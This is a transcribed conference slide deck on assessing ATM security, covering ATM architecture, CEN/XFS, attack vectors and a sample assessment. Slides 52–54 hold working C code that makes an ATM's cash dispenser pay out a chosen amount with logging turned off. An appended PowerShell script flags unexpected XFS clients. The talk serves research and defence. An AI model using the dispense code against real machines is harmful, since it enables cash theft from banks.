Erik Van Buggenhout - Royal Holloway, University of London Distance Learning Conference 2014 (presentation)

  1. Erik Van Buggenhout Royal Holloway, University of London Distance Learning Conference 2014

  2. Information Security Consultant; Instructor: Incident Response, Penetration Testing (SEC 560 & 542); Royal Holloway, University of London project: ATM security assessment framework

  3. § About the project § ATM Introduction § Attacking the ATM § Common ATM system design § Assessing a sample ATM § Conclusion

  4. Section: About the project

  5. § “A security assessment framework for Automated Teller Machines” § Finished it this year (2014) § Supervisor: Frederik Mennes

  6. Section: ATM Introduction

  7. § Automated Teller Machine § Cash depositing & dispensing § 2.2 million devices worldwide § Different hardware & software vendors

  8. The first ATM was installed in 1939 in New York City, known as the "Bankograph". It was removed after 6 months because it was not used :) It was reintroduced in Ohio in 1959, with huge success. There are currently more than 2.2 million ATMs worldwide.

  9. The ATM is a "stupid" device, part of the bank's overall architecture. It relies on back-end services for the "important" decisions: PIN validation, account balance, transfer / withdrawal authorization, ...

  10. Typical lay-out of a modern ATM: 1. ATM computer, 2. (Touch)screen, 3. Card-reader, 4. PIN pad, 5. Cash dispenser, 6. Cash cassettes

  13. Same layout, with the interfaces of the ATM computer labelled: disk bays, CD / DVD drive, auxiliary ports, USB

  14. Section: Attacking the ATM

  15. It stores MONEY. It handles interesting customer data as well, which could be abused to get MORE MONEY.

  16. Attack vectors (mind map): § Attack back-end communication § Blow up the safe § Copy cards & steal PIN codes § Attack the OS § Access "operator" mode § Steal the entire thing § ...

  22. Safe certification standards, bolts, video surveillance...

  23. Ink cartridges that stain money upon breach

  30. Anti-skimming devices

  31. Security awareness campaigns

  35. Awareness + force change of default passwords

  39. Barnaby Jack, "Jackpotting ATMs" (2010)

  40. Network access?

  41. Network access? Shodan HQ (Internet search engine) lists 800+ ATMs available on the Internet

  42. CCC 2013, "Electronic bank robberies": boot ATMs from USB

  43. Section: Common ATM system design

  44. CEN/XFS (eXtensions for Financial Services) provides a standard set of APIs that can be used by Windows applications to operate the ATM peripherals

  45. XFS layers, from application down to hardware:
      Windows-based application   (vendor independent)
      XFS APIs
      XFS Manager
      XFS SPIs
      XFS Service Providers       (vendor dependent)
      ATM peripheral
      All of it runs on the Windows operating system; CEN/XFS (eXtensions for Financial Services) provides the standard set of APIs that Windows applications use to operate the ATM peripherals.

  46. 95% of ATMs were running Windows XP in January 2014 (NCR, 2014)

  47. “How will you approach the Windows XP end-of-support?” (KAL 2013 – ATM Software Trends & Analysis)

  48. Section: Assessing a sample ATM

  49. Attack failed

  50. Using openly available forensic toolkits we managed to recover the majority of the original hard disk content.

  51. Sweet... But I don’t have a bank back-end (yet)

  52-54. Set up the XFS session with "CurrencyDispenser1" (no logging is required :)), create a dispense object tDispense and a denomination object tDenomination, fill in the denomination (I want "EUR" :), the amount is specified dynamically by a command-line argument, and you specify how many notes you want per cassette), then load the dispense with the specified denomination and execute the dispense operation:

      #include <windows.h>
      #include <xfsapi.h>   /* CEN/XFS API: WFSStartUp, WFSOpen, WFSExecute, WFSClose */
      #include <xfscdm.h>   /* CDM (cash dispenser) class: WFSCDMDISPENSE, WFSCDMDENOMINATION */

      /* nviso_amount, nviso_cassette1 and nviso_cassette2 come from the command line
       * (argument parsing is not shown in the deck). */
      HRESULT nviso_dispense(ULONG nviso_amount, ULONG nviso_cassette1, ULONG nviso_cassette2)
      {
          WFSVERSION         wfsVersion, serviceVersion, spiVersion;
          HSERVICE           service;
          LPWFSRESULT        lpResult = NULL;
          ULONG              ulaValues[5];              /* notes wanted from each of 5 cassettes */
          WFSCDMDISPENSE     tDispense     = {0};       /* the dispense object "tDispense" */
          WFSCDMDENOMINATION tDenomination = {0};       /* the denomination object "tDenomination" */
          HRESULT            hResult;

          /* Initialise the XFS Manager and open the logical service "CurrencyDispenser1" as
           * application "NVISOSPIT". WFS_TRACE_NONE: no logging; 0x0000FFFF: accept any version. */
          hResult = WFSStartUp(0x0000FFFF, &wfsVersion);
          if (hResult != WFS_SUCCESS) return hResult;
          hResult = WFSOpen("CurrencyDispenser1", WFS_DEFAULT_HAPP, "NVISOSPIT", WFS_TRACE_NONE,
                            WFS_INDEFINITE_WAIT, 0x0000FFFF, &serviceVersion, &spiVersion, &service);
          if (hResult != WFS_SUCCESS) { WFSCleanUp(); return hResult; }

          tDispense.fwPosition = WFS_CDM_POSNULL;       /* default output position */
          tDenomination.cCurrencyID[0] = 'E';           /* currency "EUR" */
          tDenomination.cCurrencyID[1] = 'U';
          tDenomination.cCurrencyID[2] = 'R';
          tDenomination.ulAmount  = nviso_amount;       /* total amount, from the command line */
          tDenomination.usCount   = 5;                  /* number of entries in lpulValues */
          tDenomination.ulCashBox = 0;
          ulaValues[0] = nviso_cassette1;               /* notes wanted from cassette 1 */
          ulaValues[1] = nviso_cassette2;               /* notes wanted from cassette 2 */
          ulaValues[2] = 0;
          ulaValues[3] = 0;
          ulaValues[4] = 0;
          tDenomination.lpulValues = ulaValues;
          tDispense.lpDenomination = &tDenomination;

          /* Load the dispense with the specified denomination and execute the dispense operation */
          hResult = WFSExecute(service, WFS_CMD_CDM_DISPENSE, &tDispense, WFS_INDEFINITE_WAIT, &lpResult);
          if (lpResult != NULL) WFSFreeResult(lpResult); /* release the result buffer */
          WFSClose(service);
          WFSCleanUp();
          return hResult;
      }

  55. TODO: Make it generic for different ATM devices (read custom config from the registry :))
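One way to approach the TODO above, as an added example that is not from the presentation or from the NVISO tool it describes: the CEN/XFS Manager (slides 44-45) keeps its configuration in the Windows registry, so an assessor can enumerate the logical service names (the "CurrencyDispenser1" string handed to WFSOpen) and the vendor service-provider DLLs behind them instead of hard-coding them, and a defender can turn the same lookup around and list which processes currently have the XFS Manager loaded and are therefore able to issue WFS_CMD_CDM_DISPENSE. Assumptions, also marked in the code: the CEN/XFS 3.x registry layout (logical services under HKEY_USERS\.DEFAULT\XFS\LOGICAL_SERVICES, providers under HKLM\SOFTWARE\XFS\SERVICE_PROVIDERS, plus the WOW6432Node view on 64-bit Windows), msxfs.dll as the XFS Manager DLL name, and a placeholder allow-list of expected client images.

```powershell
# Added example (not from the deck): inventory the CEN/XFS configuration of an ATM PC and
# flag unexpected XFS clients. Run from an elevated PowerShell on the ATM computer.
#
# Assumptions: CEN/XFS 3.x registry layout (verify against the vendor's installation),
# msxfs.dll as the XFS Manager DLL, and a site-specific allow-list of client images.

$LogicalServiceRoots = @('Registry::HKEY_USERS\.DEFAULT\XFS\LOGICAL_SERVICES')
$ProviderRoots       = @('HKLM:\SOFTWARE\XFS\SERVICE_PROVIDERS',
                         'HKLM:\SOFTWARE\WOW6432Node\XFS\SERVICE_PROVIDERS')
$XfsManagerDll       = 'msxfs.dll'

# Logical services: the names an application passes to WFSOpen (e.g. "CurrencyDispenser1"),
# each mapped to a device class ("CDM", "PIN", "IDC", ...) and a service-provider name.
function Get-XfsLogicalService {
    foreach ($root in $LogicalServiceRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root) {
            $v = Get-ItemProperty -LiteralPath $key.PSPath
            [pscustomobject]@{
                LogicalName = $key.PSChildName
                Class       = $v.class
                Provider    = $v.provider
            }
        }
    }
}

# Service providers: the vendor DLL implementing each provider, with a check that the DLL
# exists and carries a valid Authenticode signature (a replaced or unsigned provider DLL is
# the kind of trace an "attack the OS" scenario leaves behind).
function Get-XfsServiceProvider {
    foreach ($root in $ProviderRoots) {
        if (-not (Test-Path -LiteralPath $root)) { continue }
        foreach ($key in Get-ChildItem -LiteralPath $root) {
            $v   = Get-ItemProperty -LiteralPath $key.PSPath
            $dll = if ($v.dllname) { [Environment]::ExpandEnvironmentVariables($v.dllname) } else { $null }
            $sig = 'missing'
            if ($dll -and (Test-Path -LiteralPath $dll)) {
                $sig = (Get-AuthenticodeSignature -FilePath $dll).Status
            }
            [pscustomobject]@{
                Provider  = $key.PSChildName
                Vendor    = $v.vendor_name
                Dll       = $dll
                Signature = $sig
            }
        }
    }
}

# Processes that have the XFS Manager loaded, i.e. everything that can call WFSOpen and
# WFSExecute right now. Anything not on the allow-list deserves a closer look.
function Get-XfsClientProcess {
    param([string[]]$AllowedImages = @('atmapp.exe'))   # placeholder: the real ATM application image
    foreach ($proc in Get-Process) {
        # Access denied, protected processes, or a 32-bit shell inspecting a 64-bit process: skip
        try { $modules = $proc.Modules } catch { continue }
        if ($modules | Where-Object { $_.ModuleName -ieq $XfsManagerDll }) {
            $image = if ($proc.Path) { [IO.Path]::GetFileName($proc.Path) } else { $proc.ProcessName + '.exe' }
            [pscustomobject]@{
                Pid     = $proc.Id
                Image   = $image
                Path    = $proc.Path
                Allowed = ($AllowedImages -contains $image)
            }
        }
    }
}

Get-XfsLogicalService  | Format-Table -AutoSize
Get-XfsServiceProvider | Format-Table -AutoSize
Get-XfsClientProcess   | Where-Object { -not $_.Allowed } | Format-Table -AutoSize
```

The first table gives the logical names a generic dispense tool can iterate over (look for class "CDM") instead of the fixed "CurrencyDispenser1"; the last one is the check worth scheduling on a production ATM, since a dispense tool like the one on the previous slides has to load the XFS Manager to work.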

  56. DEMONSTRATION

  57. Section: Conclusion
